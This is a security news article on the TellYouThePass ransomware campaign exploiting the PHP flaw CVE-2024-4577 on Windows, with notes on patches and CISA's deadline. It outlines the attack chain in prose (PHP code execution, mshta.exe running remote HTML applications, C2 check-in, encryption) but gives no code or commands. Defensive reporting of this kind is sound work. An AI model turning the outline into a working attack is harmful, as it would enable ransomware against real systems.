Threat actors behind a recent ransomware campaign have been leveraging a new PHP vulnerability (CVE-2024-4577) in order to execute arbitrary PHP code on targeted systems.
The PHP Group last week fixed the argument injection vulnerability, which impacts all versions of PHP on Windows and affects all versions of the XAMPP development environment installed on Windows. Researchers initially said on June 7 that they observed attackers scanning for the flaw. However, in a new analysis this week, the Imperva threat research team said the flaw was being leveraged in a campaign deploying ransomware called TellYouThePass.
“From as early as June 8th, we have detected attacker activity leveraging this vulnerability to deliver malware, which we have now identified to be a part of the 'TellYouThePass' ransomware campaign,” according to Gai Stapel and Daniel Johnson with Imperva in an analysis. “As we analyzed attacks exploiting this vulnerability, we noticed a few campaigns, including WebShell upload attempts and several attempts to place ransomware on a target system.”
The TellYouThePass ransomware has been around since at least 2019, and has previously leveraged Apache vulnerabilities, like the Log4j flaw and a known and widely exploited bug in ActiveMQ (CVE-2023-46604). TellYouThePass has previously been labeled by security researchers as a commodity-level, “low sophistication” ransomware that has been used to target businesses and private individuals.
In these most recent attacks, the threat actors used the known exploit of the PHP bug in order to execute code on targeted systems. They then used living-off-the-land tactics by leveraging the “system” function to run an HTML application file, through the mshta.exe native Windows binary, which is used to execute remote payloads. After execution, the sample would send a request to the C2 server with details about the infected machine. The binary then carried out various basic ransomware functionalities, generating encryption keys and encrypting files within previously enumerated directories with predefined file extensions.
“The ‘TellYouThePass’ ransomware campaign has been in operation since 2019 and has taken various forms over the years,” including samples written in Java, .Net and Golang, according to researchers. “Recently observed variants have taken the form of .NET samples delivered using HTML applications.”
Updated versions of PHP 8.3, 8.2, and 8.1 were released on June 6, and organizations that are running vulnerable versions of PHP should update as soon as possible. In a separate advisory, the Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added CVE-2024-4577 to its Known Exploited Vulnerabilities catalog, saying it was “known to be used in ransomware campaigns,” and gave government agencies a due date of July 3 to patch the flaw.
“These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise,” said CISA.